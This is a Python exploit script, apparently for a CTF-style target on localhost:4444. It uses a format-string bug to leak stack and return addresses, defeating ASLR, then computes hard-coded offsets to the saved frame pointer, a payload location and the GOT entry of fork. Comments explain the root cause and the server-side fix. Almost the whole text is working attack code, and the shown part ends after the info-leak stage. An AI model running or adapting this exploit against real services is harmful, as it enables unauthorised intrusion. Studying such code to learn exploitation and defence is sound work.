import netcatlib

# Python 2 script (the original uses print statements); the single-argument
# print form below is accepted by both Python 2 and 3 and prints the same text.

# Step 0 --- Connect to the target
TARGET_HOST = "localhost"
TARGET_PORT = 4444
nc = netcatlib.Netcat(TARGET_HOST, TARGET_PORT)
print("[+] Connected")

# Step 1a --- Defeating ASLR with information leakage: location of stack
# The "name" we send apparently reaches a printf as the *format* argument, so
# the positional conversions "%10$p" and "%11$p" print two stack words back to
# us, each followed by a marker we can parse on.  That uncontrolled format
# string is the root cause of the leak; on the server side a fixed format
# (printf("%s", name)) removes it, and building with -Wformat-security flags
# such calls at compile time.
EBP_MARK = ":ENDEBP:"
RET_MARK = ":ENDRET:"
INFOLEAK = "%10$p" + EBP_MARK + "%11$p" + RET_MARK

# Name field: the leak string padded with "A" up to 100 bytes, then eight 0x01
# bytes and two 0xFF bytes.  The trailer is sent verbatim as in the original;
# what the binary does with it is not visible from this script.
name_field = INFOLEAK.ljust(100, "A") + "\x01" * 8 + "\xFF\xFF"

nc.read_until("Your choice: ")
nc.write("1\n")
nc.read_until("Insert name: ")
nc.write(name_field + "\n")

# The reply echoes the name after this prefix; read_until() is expected to
# return the data up to and including the marker, which is then stripped.
nc.read_until("Uranium in nuclear plant \"")
leaked_ebp = nc.read_until(EBP_MARK)[:-len(EBP_MARK)]
ebp = int(leaked_ebp, 16)
print("[+] Saved frame pointer : " + hex(ebp))

# Addresses derived from the leaked saved frame pointer.  The offsets are
# hard-coded for the target binary's stack layout (taken as-is from the
# original script).
location_ebp = ebp - 0x440
location_ebp_printf = location_ebp - 0x30
location_payload = ebp + 0x20 + 10 * 112
print(" > Location saved fp : " + hex(location_ebp))
print(" > Location fp in printf : " + hex(location_ebp_printf))
print(" > Location of 1st payload : " + hex(location_payload))

# Step 1b --- Defeating ASLR with information leakage: return address
# The second leaked word is a return address; the GOT entry of fork is taken
# to lie at a fixed distance (0x2E8E) from it, again specific to this binary.
leaked_ret = nc.read_until(RET_MARK)[:-len(RET_MARK)]
ret = int(leaked_ret, 16)
print("[+] Return address : " + hex(ret))
location_got_fork = ret + 0x2E8E
print(" > Location of fork in GOT : " + hex(location_got_fork))